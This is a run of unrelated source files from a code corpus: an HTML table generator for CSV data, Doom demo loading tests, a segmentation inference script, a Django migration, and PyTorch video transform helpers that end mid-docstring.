'''.format(table_css_2)
text = """
<?xml version="1.0" encoding="utf-8"?>
<html>
<!-- made by csv_print_html_oia.py -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Expires" content="0">
{}
</head>
<body>
""".format(table_css)
if title is not None and len(title) > 0:
text += f'<h2 class="title">{title}</h2>'
word_colors = re.sub(r"\"", """, word_colors)
if search_on_html:
text += """
<script type="text/javascript" src="{}"></script>
<script type="text/javascript">
// クリック時に特殊キーを検知させる http://www.shurey.com/js/samples/1_tips16.html
KEY_SHIFT = false;
KEY_CTL = false;
KEY_ALT = false;
KEY_META = false;
document.onkeydown = function(event) {{
var key_event = event|| window.event;
KEY_SHIFT = (key_event.shiftKey);
KEY_CTL = (key_event.ctrlKey);
KEY_ATL = (key_event.altKey);
KEY_META = (key_event.metaKey);
}}
document.onkeyup = function(event) {{
var key_event = event|| window.event;
KEY_SHIFT = (key_event.shiftKey);
KEY_CTL = (key_event.ctrlKey);
KEY_ATL = (key_event.altKey);
KEY_META = (key_event.metaKey);
}}
function oia_dblclick_from_td_0(val_dic){{
if(typeof(oia_dblclick_from_td) == "function"){{
oia_dblclick_from_td(val_dic);
}} else {{
alert("リンク先が設定されていません");
}}
}}
</script>
<script type="text/javascript">
window.onload=function(){{
if( window.location.hash.length > 0){{
window.scroll(0,window.scrollY-32);
}}
if( window.location.search.length > 0){{
let search_string=decodeURI(window.location.search.substring(1));
window.find(search_string,false,false,true,false,true);
}}
show_hide_progress_bar(false);
}}
function show_hide_progress_bar(onoff){{
let prg_elm= document.getElementById("progfs");
if( prg_elm){{
if(onoff){{
prg_elm.style.visibility="visible";
}} else {{
prg_elm.style.visibility="hidden";
}}
}}
}}
function show_nrec_record(nrec,onoff){{
let tr_objs= document.evaluate("/html//tr[@nrec=\\""+nrec+"\\"]",document,null,XPathResult.ANY_TYPE, null);
let tr_node= tr_objs.iterateNext();
while(tr_node){{
if( onoff ){{
tr_node.style.display="";
}} else {{
tr_node.style.display="none";
}}
tr_node= tr_objs.iterateNext();
}}
}}
function show_nohits_record(obj){{
if( obj.checked){{
onoff=true;
}} else {{
onoff=false;
}}
let xp_results_0= document.evaluate("/html//td[@hits_status=\\"1\\"]",document,null,XPathResult.ANY_TYPE, null);
let node= xp_results_0.iterateNext();
let nrec_hits=[];
while( node){{
let nrec= node.getAttribute("nrec");
nrec_hits.push(nrec);
show_nrec_record(nrec,true);
node= xp_results_0.iterateNext();
}}
show_nrec_record(onoff);
let xp_results= document.evaluate("/html//td[@hits_status=\\"0\\"]",document,null,XPathResult.ANY_TYPE, null);
node= xp_results.iterateNext();
while( node){{
let nrec= node.getAttribute("nrec");
if( nrec_hits.indexOf(nrec) != -1){{
node= xp_results.iterateNext();
continue;
}}
show_nrec_record(nrec, onoff);
node= xp_results.iterateNext();
}}
}}
function word_color(word,color_code){{
var nodes= document.getElementsByTagName("td");
let count=0;
for(var i=0; i< nodes.length; i++){{
// let wre= word.replace(/[\\^$.*+?()\\[\\]{{}}|]/g, '\\\\$&');
let wre= word.replace(/</g, '<');
wre= wre.replace(/>/g, '>');
let re= new RegExp('(?<!<[^>]*)('+wre+')','gi');
nodes[i].innerHTML=nodes[i].innerHTML.replace(re,'<span class="word_view_span" style="color:'+color_code+'">$1</span>');
count_0= (nodes[i].innerHTML.match(re) ||[]).length;
if( count_0 > 0){{
nodes[i].setAttribute("hits_status","1");
}} else {{
nodes[i].setAttribute("hits_status","0");
}}
count= count+ count_0;
}}
return count;
}}
function word_color_reset(){{
var nodes= document.getElementsByTagName("td");
for(var i=0; i< nodes.length; i++){{
span_head='<span class="word_view_span"'
let re = new RegExp(span_head+' style="color:[^\"]+">([^<]+?)</span>','gi');
while( nodes[i].innerHTML.indexOf(span_head) != -1){{
nodes[i].innerHTML=nodes[i].innerHTML.replace(re,'$1');
nodes[i].setAttribute("hits_status","0");
}}
}}
}}
function emphasis_words(obj){{
let wc_defs= obj.value;
let re_s= new RegExp(/(?<!\\\\)\s*,\s*/,'g')
obj.value= obj.value.replace(re_s,", ");
let re= /\s*(?<!\\\\),\s*/;
let cvs= wc_defs.split(re);
let word_counts={{}};
word_color_reset();
show_hide_progress_bar(true);
cvs.forEach(
function (val ){{
if(val==""){{
return;
}}
let re= /\s*(?<!\\\\):\s*/;
cvs=val.split(re);
var w="";
var c="";
if( cvs.length < 2){{
// alert("??error:word_view:invalid definition: '"+val+"'");
w= cvs[0];
c="red";
}} else {{
let re= new RegExp('\\\\\\\\([,:])','g');
w= cvs[0];
w=w.replace(re,'$1');
c= cvs[1];
}}
if(!c.match(/^[a-zA-Z0-9#]+$/)){{
alert("??error:word_view:invalid color code: '"+c+"'");
return;
}}
try{{
word_counts[String(w)]=word_color(w,c);
}} catch(e){{
alert("??error:word_view:invalid definition: '"+val+"' :"+e);
}}
}}
);
let sh_obj= document.getElementById("showhide_hits");
show_nohits_record(sh_obj);
let swr= document.getElementById('search_word_result');
swr.innerHTML="検索結果:"+JSON.stringify(word_counts);
show_hide_progress_bar(false);
}}
function show_word_search(){{
let fobj= document.getElementById("word_search");
sty_visibility=fobj.style.visibility;
if( sty_visibility == "" || sty_visibility == "hidden"){{
fobj.style.visibility="visible";
}} else {{
fobj.style.visibility="hidden";
}}
}}
</script>
<form action="" onsubmit="return false;" class="word_search" id="word_search" ondblclick="show_word_search();">
<fieldset style="padding-top:0pt;padding-bottom:0pt;">
<legend>語句色付け定義</legend>
<input type="text" size="138" placeholder="Enter word:color[,word:color...]" onchange="emphasis_words(this)" value="{}"><br/>
<input type="checkbox" id="showhide_hits" name="showhide_hits" checked onchange="show_nohits_record(this)"/>
<label for="showhide_hist" style="font-size:0.5em;">全レコード表示</label><br/>
<span style="font-size:0.5em;">
語句の色付け定義を"語句:色"で入力。複数入力する場合は半角カンマで区切って入力、語句には正規表現を利用可能<br>
語句だけ指定した場合は、赤色が指定されたものとして処理される。
語句に半角カンマ、コロンを含める場合はBackslash(\\)によりエスケープする必要がある。
また、<>は検索時に&lt;&gt;として検索されることに注意。<br>
Ex: ABC:red,DEF\,GHI:blue,\d+人:black
</span><br>
<span style="font-size:small;" id="search_word_result"></span>
</fieldset>
</form>
""".format(OIA_HANDLER_JS, word_colors)
else:
text += f'<input value="{word_colors}" style="display:none" />\n'
if progress_bar:
text += """
<fieldset id="progfs"
style="padding-top:0pt;padding-bottom:0pt;position:fixed;height:2em;top:1em;right:10;background-color:white;z-index:100;padding:0.5em;background-color: #e0ffff;">
<label for="progbar" style="font-size:0.5em;">しばらくお待ちください</label>
<progress id="progbar" style="width:20em;height:1em;"></progress>
</fieldset>
"""
return text
def html_epiloge(datatable=False):
# DataTables example - Scroll - horizontal and vertical https://datatables.net/examples/basic_init/scroll_xy.html
if datatable:
text = '''
<script type="text/javascript">$(document).ready(function(){$('table').DataTable({
lengthChange: false,
scrollX: true,
scrollY: "80vh",
paging: false
});});</script>
'''
else:
text = ""
text += '''
</body>
</html>
'''
return text
def part_color(pcolors, text):
hit_words = {}
for pc in pcolors:
cvs = re.split(r"(?<!\\):", pc)
if len(cvs) < 2:
# print(f"??error:csv_print_html:invalid format for --part_color:{pc}", file=sys.stderr)
# sys.exit(1)
cvs.append("red")
w = cvs[0]
w = re.sub(r"\\([,:])", r"\1", w)
w = w.strip("'\"")
w_0 = w
w = html.escape(str(w))
w0 = "(" + w + ")"
c = cvs[1]
fmt = f"color:{c};"
sp = f'<span class="word_view_span" style="{fmt}">\\1</span>'
text_0 = text
text = re.sub(w0, sp, text)
if text_0 != text:
hit_words[w_0] = text_0.count(w_0)
return text, hit_words
def make_table(df, columns, oia_columns, pcolors, space_width="40pm"):
output_df = df.copy()
output_df["hits_words"] = ""
html_str = '\n<table class="sticky_table display nowrap" style="width:100%;">\n'
html_str += '<thead ondblclick="show_word_search();">\n'
n_oia = len(oia_columns)
for c in columns:
html_str += f"<th>{c}</th>\n"
html_str += f'<th colspan="{n_oia+1}">Observation/Investigation/Action</th>\n'
html_str += '</thead>\n<tbody>\n'
df.fillna("", inplace=True)
for ir, row in df.iterrows():
if ir % 2 == 0:
tr_sty = 'style="background-color:#eeffee;"'
else:
tr_sty = ""
html_str += f"<tr {tr_sty} nrec=\"{ir}\" id=\"rid_{ir}\">\n"
check_empty = all([v == "" for v in row[oia_columns]])
n_oia_h = 1 if check_empty else n_oia
td_columns = {"nrec": ir}
html_str_0 = ""
for c in columns:
v = html.escape(str(row[c]))
td_columns[c] = v
if pcolors is not None and len(pcolors) > 0:
v, hw = part_color(pcolors, v)
v = " " if v == "" else v
html_str_0 += f"<td nowrap=1 rowspan='{n_oia_h}' ondblclick='oia_dblclick_from_td_0()' class='dblclicable'>{v}</td>\n"
html_str_0 = re.sub(r"oia_dblclick_from_td_0\(\)", f"oia_dblclick_from_td_0({json.dumps(td_columns, ensure_ascii=False)})",
html_str_0)
html_str += html_str_0
if not check_empty:
hits_words = {}
for ic, c in enumerate(oia_columns):
v = html.escape(str(row[c]))
if pcolors is not None and len(pcolors) > 0:
v, hw = part_color(pcolors, v)
hits_words.update(hw)
v = " " if v == "" else v
hits_status = 1 if len(hits_words) > 0 else 0
html_str += (f'<td width="{space_width}"></td>' *
ic) + f'<td colspan="{4-ic}" nrec="{ir}" hits_status="{hits_status}">{v}</td>\n'
if ic < len(oia_columns) - 1:
html_str += f'</tr>\n<tr {tr_sty} nrec={ir}>\n'
output_df.at[ir, "hits_words"] = output_df.at[ir, "hits_words"] + str(hits_words)
else:
html_str += '<td></td>' * n_oia
html_str += "</tr>\n"
html_str += "</tbody>\n</table>\n"
return html_str, output_df
def make_oia_handler_template(columns, output_js):
if Path(output_js).exists():
print(f"#warn:csv_print_html_oia: {output_js} already exists.", file=sys.stderr)
return
js_str = f"""
// -*- coding:utf-8 mode:javascript -*-
// File: oia_handler.js
function oia_dblclick_from_td(val_dic){{
// index: 'nrec' and {columns}
// special key(boolean):
// KEY_SHIFT, KEY_CTL, KEY_ALT, KEY_META
// enter codes
console.log(val_dic, KEY_SHIFT);
alert("{output_js}を編集してください。");
// let html_url="test.html";
// let nrec= val_dic["nrec"]; // record number in csv
// let id_in_html="rid_"+nrec;
// let url=html_url+"#"+id_in_html;
// window.open(url,"__blank");
}}
"""
with open(output_js, "w") as f:
print(js_str, file=f)
print(f"%inf:csv_print_html_oia: {output_js} was created.", file=sys.stderr)
if __name__ == "__main__":
output_js = OIA_HANDLER_JS
args = init()
csv_file = args.csv_file
output_file = args.OUTPUT
oia_columns = args.oia_columns
title = args.TITLE
columns_s = args.COLUMNS
pcolors_s = args.PCOLORS
search_on_html = args.SHTML
html_minify = args.MINIFY
pcolors = None
if pcolors_s is not None:
pcolors = re.split(r"\s*(?<!\\),\s*", pcolors_s)
print(f"%inf:csv_print_html:part colors: {pcolors}", file=sys.stderr)
else:
pcolors_s = ""
columns = []
if columns_s is not None:
columns = re.split(r"\s*,\s*", columns_s)
if csv_file == "-":
csv_file = sys.stdin
output_csv_file = "output_oia.csv"
else:
output_csv_file = Path(csv_file).stem + "_output.csv"
if output_file != sys.stdout:
output_file = open(output_file, "w")
csv_df = pd.read_csv(csv_file, dtype='object')
progress_bar = len(csv_df) > 500
html_str = html_prologe_oia(width=None, word_colors=pcolors_s, search_on_html=search_on_html, title=title, progress_bar=progress_bar)
html_str += "<div id='tablecontainer'>"
table_str, output_df = make_table(csv_df, columns, oia_columns, pcolors)
html_str += table_str
html_str += "</div>"
html_str += html_epiloge()
if html_minify:
try:
html_str = minify_html.minify(html_str, minify_js=True, minify_css=True)
except SyntaxError as e:
mes = f'??error:csv_print_html_oia:{e}'
print(mes, file=sys.stderr)
sys.exit(1)
print(html_str, file=output_file)
if pcolors is not None:
output_df.to_csv(output_csv_file, index=False)
print(f"%inf:csv_print_html: {output_csv_file} was created.", file=sys.stderr)
make_oia_handler_template(columns, output_js)
| StarcoderdataPython |
154106 | import unittest
import run as lmpkit
# just some notes on prboom+ compat levels so I can't botch this
#
# test_01 - 3 - Doom Ultimate - Doom 1 - E1L1
# test_02 - 3 - Doom Ultimate - Doom 1 - E1L1
# test_03 - 3 - Doom Ultimate - Doom 1 - E1L1
# test_04 - 17 - PRBoom 6 - Doom 1 - E1L1
# test_05 - 16 - PRBoom 5 - Doom 1 - E1L1
#
# probably they hid this somewhere
# needs must locate when I get a chance
class TestLoads(unittest.TestCase):
'''
Just tests basic loading for files into framework
'''
def test_01(self):
lmpkit.createDemoLumpFromFile("test_files/test_01.lmp")
def test_02(self):
lmpkit.createDemoLumpFromFile("test_files/test_02.lmp")
def test_03(self):
lmpkit.createDemoLumpFromFile("test_files/test_03.lmp")
def test_04(self):
lmpkit.createDemoLumpFromFile("test_files/test_04.lmp")
def test_05(self):
lmpkit.createDemoLumpFromFile("test_files/test_05.lmp")
class TestLoadedLengths(unittest.TestCase):
'''
Tests lengths of loaded files
'''
def test_01(self):
# prboom says 1420 tics
lmpkit.createDemoLumpFromFile("test_files/test_01.lmp")
def test_02(self):
# prboom says 2204 tics
lmpkit.createDemoLumpFromFile("test_files/test_02.lmp")
def test_03(self):
# prboom says 694 tics
lmpkit.createDemoLumpFromFile("test_files/test_03.lmp")
def test_04(self):
# prboom says ??? tics
lmpkit.createDemoLumpFromFile("test_files/test_04.lmp")
def test_05(self):
# prboom says ??? tics
lmpkit.createDemoLumpFromFile("test_files/test_05.lmp")
if __name__ == '__main__':
unittest.main() | StarcoderdataPython |
1695935 | class ZCItoolsException(Exception):
pass
class ZCItoolsValueError(ZCItoolsException):
pass
| StarcoderdataPython |
3362302 | <gh_stars>0
import os
from mmseg.apis import init_segmentor, inference_segmentor, show_result_pyplot
from mmseg.core.evaluation import get_palette
from matplotlib import pyplot as plt
import mmcv
from collections import Counter
from PIL import Image
import numpy as np
from tqdm import tqdm
config_file = r"D:\林彬\mmsegmentation-master\configs\dnlnet\dnl_r101-d8_512x512_160k_ade20k.py"
checkpoint_file = r"D:\林彬\mmsegmentation-master\tools\dnl_r101_yaogan_5\iter_160000.pth"
model = init_segmentor(config_file, checkpoint_file, device='cuda:1')
img_root = r'..\tools\data\test_jpg/jpg/'
save_mask_root = r"..\tools\data\DNLNetpre/"
if not os.path.exists(save_mask_root):
os.mkdir(save_mask_root)
img_names = os.listdir(img_root)
# print(img_names)
for img_name in tqdm(img_names):
# test a single image
img = img_root + img_name
result = inference_segmentor(model, img)[0]
img = Image.fromarray(np.uint8(result))
img.save(save_mask_root + img_name) | StarcoderdataPython |
1624946 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('library', '0013_auto_20170613_1705'),
]
operations = [
migrations.RemoveField(
model_name='waitorderitem',
name='find_id',
),
migrations.RemoveField(
model_name='waitorderitem',
name='if_phone',
),
migrations.RemoveField(
model_name='waitorderitem',
name='location',
),
migrations.RemoveField(
model_name='waitorderitem',
name='status',
),
migrations.AddField(
model_name='waitorderitem',
name='book_id',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='waitorderitem',
name='may_return_time',
field=models.CharField(default=None, max_length=200),
),
migrations.AddField(
model_name='waitorderitem',
name='title',
field=models.TextField(default=None),
),
]
| StarcoderdataPython |
1761824 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import copy
import math
from typing import Tuple
import numpy as np
import torch
try:
import cv2
except ImportError:
_HAS_CV2 = False
else:
_HAS_CV2 = True
def uniform_temporal_subsample(
x: torch.Tensor, num_samples: int, temporal_dim: int = -3
) -> torch.Tensor:
"""
Uniformly subsamples num_samples indices from the temporal dimension of the video.
When num_samples is larger than the size of temporal dimension of the video, it
will sample frames based on nearest neighbor interpolation.
Args:
x (torch.Tensor): A video tensor with dimension larger than one with torch
tensor type includes int, long, float, complex, etc.
num_samples (int): The number of equispaced samples to be selected
temporal_dim (int): dimension of temporal to perform temporal subsample.
Returns:
An x-like Tensor with subsampled temporal dimension.
"""
t = x.shape[temporal_dim]
assert num_samples > 0 and t > 0
# Sample by nearest neighbor interpolation if num_samples > t.
indices = torch.linspace(0, t - 1, num_samples)
indices = torch.clamp(indices, 0, t - 1).long()
return torch.index_select(x, temporal_dim, indices)
@torch.jit.ignore
def _interpolate_opencv(
x: torch.Tensor, size: Tuple[int, int], interpolation: str
) -> torch.Tensor:
"""
Down/up samples the input torch tensor x to the given size with given interpolation
mode.
Args:
input (Tensor): the input tensor to be down/up sampled.
size (Tuple[int, int]): expected output spatial size.
interpolation: model to perform interpolation, options include `nearest`,
`linear`, `bilinear`, `bicubic`.
"""
if not _HAS_CV2:
raise ImportError(
"opencv is required to use opencv transforms. Please "
"install with 'pip install opencv-python'."
)
_opencv_pytorch_interpolation_map = {
"nearest": cv2.INTER_NEAREST,
"linear": cv2.INTER_LINEAR,
"bilinear": cv2.INTER_AREA,
"bicubic": cv2.INTER_CUBIC,
}
assert interpolation in _opencv_pytorch_interpolation_map
new_h, new_w = size
img_array_list = [
img_tensor.squeeze(0).numpy()
for img_tensor in x.permute(1, 2, 3, 0).split(1, dim=0)
]
resized_img_array_list = [
cv2.resize(
img_array,
(new_w, new_h), # The input order for OpenCV is w, h.
interpolation=_opencv_pytorch_interpolation_map[interpolation],
)
for img_array in img_array_list
]
img_array = np.concatenate(
[np.expand_dims(img_array, axis=0) for img_array in resized_img_array_list],
axis=0,
)
img_tensor = torch.from_numpy(np.ascontiguousarray(img_array))
img_tensor = img_tensor.permute(3, 0, 1, 2)
return img_tensor
def short_side_scale(
x: torch.Tensor,
size: int,
interpolation: str = "bilinear",
backend: str = "pytorch",
) -> torch.Tensor:
"""
Determines the shorter spatial dim of the video (i.e. width or height) and scales
it to the given size. To maintain aspect ratio, the longer side is then scaled
accordingly.
Args:
x (torch.Tensor): A video tensor of shape (C, T, H, W) and type torch.float32.
size (int): The size the shorter side is scaled to.
interpolation (str): Algorithm used for upsampling,
options: nearest' | 'linear' | 'bilinear' | 'bicubic' | 'trilinear' | 'area'
backend (str): backend used to perform interpolation. Options includes
`pytorch` as default, and `opencv`. Note that opencv and pytorch behave
differently on linear interpolation on some versions.
https://discuss.pytorch.org/t/pytorch-linear-interpolation-is-different-from-pil-opencv/71181
Returns:
An x-like Tensor with scaled spatial dims.
""" # noqa
assert len(x.shape) == 4
assert x.dtype == torch.float32
assert backend in ("pytorch", "opencv")
c, t, h, w = x.shape
if w < h:
new_h = int(math.floor((float(h) / w) * size))
new_w = size
else:
new_h = size
new_w = int(math.floor((float(w) / h) * size))
if backend == "pytorch":
return torch.nn.functional.interpolate(
x, size=(new_h, new_w), mode=interpolation, align_corners=False
)
elif backend == "opencv":
return _interpolate_opencv(x, size=(new_h, new_w), interpolation=interpolation)
else:
raise NotImplementedError(f"{backend} backend not supported.")
def uniform_temporal_subsample_repeated(
frames: torch.Tensor, frame_ratios: Tuple[int], temporal_dim: int = -3
) -> Tuple[torch.Tensor]:
"""
Prepare output as a list of tensors subsampled from the input frames. Each tensor
maintain a unique copy of subsampled frames, which corresponds to a unique
pathway.
Args:
frames (tensor): frames of images sampled from the video. Expected to have
torch tensor (including int, long, float, complex, etc) with dimension
larger than one.
frame_ratios (tuple): ratio to perform temporal down-sampling for each pathways.
temporal_dim (int): dimension of temporal.
Returns:
frame_list (tuple): list of tensors as output.
"""
temporal_length = frames.shape[temporal_dim]
frame_list = []
for ratio in frame_ratios:
pathway = uniform_temporal_subsample(
frames, temporal_length // ratio, temporal_dim
)
frame_list.append(pathway)
return frame_list
def convert_to_one_hot(
targets: torch.Tensor,
num_class: int,
label_smooth: float = 0.0,
) -> torch.Tensor:
"""
This function converts target class indices to one-hot vectors,
given the number of classes.
Args:
targets (torch.Tensor): Index labels to be converted.
num_class (int): Total number of classes.
label_smooth (float): Label smooth value for non-target classes. Label smooth
is disabled by default (0).
"""
assert (
torch.max(targets).item() < num_class
), "Class Index must be less than number of classes"
assert 0 <= label_smooth < 1.0, "Label smooth value needs to be between 0 and 1."
non_target_value = label_smooth / num_class
target_value = 1.0 - label_smooth + non_target_value
one_hot_targets = torch.full(
(targets.shape[0], num_class),
non_target_value,
dtype=torch.long if label_smooth == 0.0 else None,
device=targets.device,
)
one_hot_targets.scatter_(1, targets.long().view(-1, 1), target_value)
return one_hot_targets
def short_side_scale_with_boxes(
images: torch.Tensor,
boxes: torch.Tensor,
size: int,
interpolation: str = "bilinear",
backend: str = "pytorch",
) -> Tuple[torch.Tensor, np.ndarray]:
"""
Perform a spatial short scale jittering on the given images and
corresponding boxes.
Args:
images (tensor): images to perform scale jitter. Dimension is
`channel` x `num frames` x `height` x `width`.
boxes (tensor): Corresponding boxes to images.
Dimension is `num boxes` x 4.
size (int): The size the shorter side is scaled to.
interpolation (str): Algorithm used for upsampling,
options: nearest' | 'linear' | 'bilinear' | 'bicubic' | 'trilinear' | 'area'
backend (str): backend used to perform interpolation. Options includes
`pytorch` as default, and `opencv`. Note that opencv and pytorch behave
differently on linear interpolation on some versions.
https://discuss.pytorch.org/t/pytorch-linear-interpolation-is-different-from-pil-opencv/71181
Returns:
(tensor): the scaled images with dimension of
`channel` x `num frames` x `height` x `width`.
(tensor): the scaled boxes with dimension of
`num boxes` x 4.
"""
c, t, h, w = images.shape
images = short_side_scale(images, size, interpolation, backend)
_, _, new_h, new_w = images.shape
if w < h:
boxes *= float(new_h) / h
else:
boxes *= float(new_w) / w
return images, boxes
def random_short_side_scale_with_boxes(
images: torch.Tensor,
boxes: torch.Tensor,
min_size: int,
max_size: int,
interpolation: str = "bilinear",
backend: str = "pytorch",
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Perform a spatial short scale jittering on the given images and
corresponding boxes.
Args:
images (tensor): images to perform scale jitter. Dimension is
`channel` x `num frames` x `height` x `width`.
boxes (tensor): Corresponding boxes to images.
Dimension is `num boxes` x 4.
min_size (int): the minimal size to scale the frames.
max_size (int): the maximal size to scale the frames.
interpolation (str): Algorithm used for upsampling,
options: nearest' | 'linear' | 'bilinear' | 'bicubic' | 'trilinear' | 'area'
backend (str): backend used to perform interpolation. Options includes
`pytorch` as default, and `opencv`. Note that opencv and pytorch behave
differently on linear interpolation on some versions.
https://discuss.pytorch.org/t/pytorch-linear-interpolation-is-different-from-pil-opencv/71181
Returns:
(tensor): the scaled images with dimension of
`channel` x `num frames` x `height` x `width`.
(tensor): the scaled boxes with dimension of
`num boxes` x 4.
"""
size = torch.randint(min_size, max_size + 1, (1,)).item()
return short_side_scale_with_boxes(images, boxes, size, interpolation, backend)
def random_crop_with_boxes(
images: torch.Tensor, size: int, boxes: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Perform random spatial crop on the given images and corresponding boxes.
Args:
images (tensor): images to perform random crop. The dimension is
`channel` x `num frames` x `height` x `width`.
size (int): the size of height and width to crop on the image.
boxes (tensor): Corresponding boxes to images.
Dimension is `num boxes` x 4.
Returns:
cropped (tensor): cropped images with dimension of
`channel` x `num frames` x `height` x `width`.
cropped_boxes (tensor): the cropped boxes with dimension of
`num boxes` x 4.
"""
if images.shape[2] == size and images.shape[3] == size:
return images
height = images.shape[2]
width = images.shape[3]
y_offset = 0
if height > size:
y_offset = int(np.random.randint(0, height - size))
x_offset = 0
if width > size:
x_offset = int(np.random.randint(0, width - size))
cropped = images[:, :, y_offset : y_offset + size, x_offset : x_offset + size]
cropped_boxes = crop_boxes(boxes, x_offset, y_offset)
return cropped, clip_boxes_to_image(
cropped_boxes, cropped.shape[-2], cropped.shape[-1]
)
def _uniform_crop_helper(images: torch.Tensor, size: int, spatial_idx: int):
"""
A helper function grouping the common components in uniform crop
"""
assert spatial_idx in [0, 1, 2]
height = images.shape[2]
width = images.shape[3]
y_offset = int(math.ceil((height - size) / 2))
x_offset = int(math.ceil((width - size) / 2))
if height > width:
if spatial_idx == 0:
y_offset = 0
elif spatial_idx == 2:
y_offset = height - size
else:
if spatial_idx == 0:
x_offset = 0
elif spatial_idx == 2:
x_offset = width - size
cropped = images[:, :, y_offset : y_offset + size, x_offset : x_offset + size]
return cropped, x_offset, y_offset
def uniform_crop(
images: torch.Tensor,
size: int,
spatial_idx: int,
) -> torch.Tensor:
"""
Perform uniform spatial sampling on the images and corresponding boxes.
Args:
images (tensor): images to perform uniform crop. The dimension is
`channel` x `num frames` x `height` x `width`.
size (int): size of height and weight to crop the images.
spatial_idx (int): 0, 1, or 2 for left, center, and right crop if width
is larger than height. Or 0, 1, or 2 for top, center, and bottom
crop if height is larger than width.
Returns:
cropped (tensor): images with dimension of
`channel` x `num frames` x `height` x `width`.
"""
cropped, _, _ = _uniform_crop_helper(images, size, spatial_idx)
return cropped
def uniform_crop_with_boxes(
images: torch.Tensor,
size: int,
spatial_idx: int,
boxes: torch.Tensor,
) -> Tuple[torch.Tensor, np.ndarray]:
"""
Perform uniform spatial sampling on the images and corresponding boxes.
Args:
images (tensor): images to perform uniform crop. The dimension is
`channel` x `num frames` x `height` x `width`.
size (int): size of height and weight to crop the images.
spatial_idx (int): 0, 1, or 2 for left, center, and right crop if width
is larger than height. Or 0, 1, or 2 for top, center, and bottom
crop if height is larger than width.
boxes (tensor): Corresponding boxes to images.
Dimension is `num boxes` x 4.
Returns:
cropped (tensor): images with dimension of
`channel` x `num frames` x `height` x `width`.
cropped_boxes (tensor): the cropped boxes with dimension of
`num boxes` x 4.
"""
cropped, x_offset, y_offset = _uniform_crop_helper(images, size, spatial_idx)
cropped_boxes = crop_boxes(boxes, x_offset, y_offset)
return cropped, clip_boxes_to_image(
cropped_boxes, cropped.shape[-2], cropped.shape[-1]
)
def horizontal_flip_with_boxes(
prob: float, images: torch.Tensor, boxes: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Perform horizontal flip on the given images and corresponding boxes.
Args:
prob (float): probility to flip the images.
images (tensor): images to perform horizontal flip, the dimension is
`channel` x `num frames` x `height` x `width`.
boxes (tensor): Corresponding boxes to images.
Dimension is `num boxes` x 4.
Returns:
images (tensor): images with dimension of
`channel` x `num frames` x `height` x `width`.
flipped_boxes (tensor): the flipped boxes with dimension of
`num boxes` x 4.
"""
flipped_boxes = copy.deepcopy(boxes)
if np.random.uniform() < prob:
images = images.flip((-1))
width = images.shape[3]
flipped_boxes[:, [0, 2]] = width - boxes[:, [2, 0]] - 1
return images, flipped_boxes
def clip_boxes_to_image(boxes: torch.Tensor, height: int, width: int) -> torch.Tensor:
"""
Clip an array of boxes to an image with the given height and width.
Args:
boxes (tensor): bounding boxes to perform clipping.
Dimension is `num boxes` x 4.
height (int): given image height.
width (int): given image width.
Returns:
clipped_boxes (tensor): the clipped boxes with dimension of
`num boxes` x 4.
"""
clipped_boxes = copy.deepcopy(boxes)
clipped_boxes[:, [0, 2]] = np.minimum(
width - 1.0, np.maximum(0.0, boxes[:, [0, 2]])
)
clipped_boxes[:, [1, 3]] = np.minimum(
height - 1.0, np.maximum(0.0, boxes[:, [1, 3]])
)
return clipped_boxes
def crop_boxes(boxes: torch.Tensor, x_offset: int, y_offset: int) -> torch.Tensor:
"""
Peform crop on the bounding boxes given the offsets.
Args:
boxes (torch.Tensor): bounding boxes to peform crop. The dimension
is `num boxes` x 4.
x_offset (int): cropping offset in the x axis.
y_offset (int): cropping offset in the y axis.
Returns:
cropped_boxes (torch.Tensor): the cropped boxes with dimension of
`num boxes` x 4.
"""
cropped_boxes = copy.deepcopy(boxes)
cropped_boxes[:, [0, 2]] = boxes[:, [0, 2]] - x_offset
cropped_boxes[:, [1, 3]] = boxes[:, [1, 3]] - y_offset
return cropped_boxes
def _get_param_spatial_crop(
scale: Tuple[float, float],
ratio: Tuple[float, float],
height: int,
width: int,
log_uniform_ratio: bool = True,
num_tries: int = 10,
) -> Tuple[int, int, int, int]:
"""
Given scale, ratio, height and width, return sampled coordinates of the videos.
Args:
scale (Tuple[float, float]): Scale range of Inception-style area based
random resizing.
ratio (Tuple[float, float]): Aspect ratio range of Inception-style
area based random resizing.
height (int): Height of the original image.
width (int): Width of the original image.
log_uniform_ratio (bool): Whether to use a log-uniform distribution to
sample the aspect ratio. Default is True.
num_tries (int): The number of times to attempt a randomly resized crop.
Falls back to a central crop after all attempts are exhausted.
Default is 10.
Returns:
Tuple containing i, j, h, w. (i, j) are the coordinates of the top left
corner of the crop. (h, w) are the height and width of the crop.
"""
assert num_tries >= 1, "num_tries must be at least 1"
if scale[0] > scale[1]:
scale = (scale[1], scale[0])
if ratio[0] > ratio[1]:
ratio = (ratio[1], ratio[0])
for _ in range(num_tries):
area = height * width
target_area = area * (scale[0] + torch.rand(1).item() * (scale[1] - scale[0]))
if log_uniform_ratio:
log_ratio = (math.log(ratio[0]), math.log(ratio[1]))
aspect_ratio = math.exp(
log_ratio[0] + torch.rand(1).item() * (log_ratio[1] - log_ratio[0])
)
else:
aspect_ratio = ratio[0] + torch.rand(1).item() * (ratio[1] - ratio[0])
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < w <= width and 0 < h <= height:
i = torch.randint(0, height - h + 1, (1,)).item()
j = torch.randint(0, width - w + 1, (1,)).item()
return i, j, h, w
# Fallback to central crop.
in_ratio = float(width) / float(height)
if in_ratio < min(ratio):
w = width
h = int(round(w / min(ratio)))
elif in_ratio > max(ratio):
h = height
w = int(round(h * max(ratio)))
else: # whole image
w = width
h = height
i = (height - h) // 2
j = (width - w) // 2
return i, j, h, w
def random_resized_crop(
frames: torch.Tensor,
target_height: int,
target_width: int,
scale: Tuple[float, float],
aspect_ratio: Tuple[float, float],
shift: bool = False,
log_uniform_ratio: bool = True,
interpolation: str = "bilinear",
num_tries: int = 10,
) -> torch.Tensor:
"""
Crop the given images to random size and aspect ratio. A crop of random
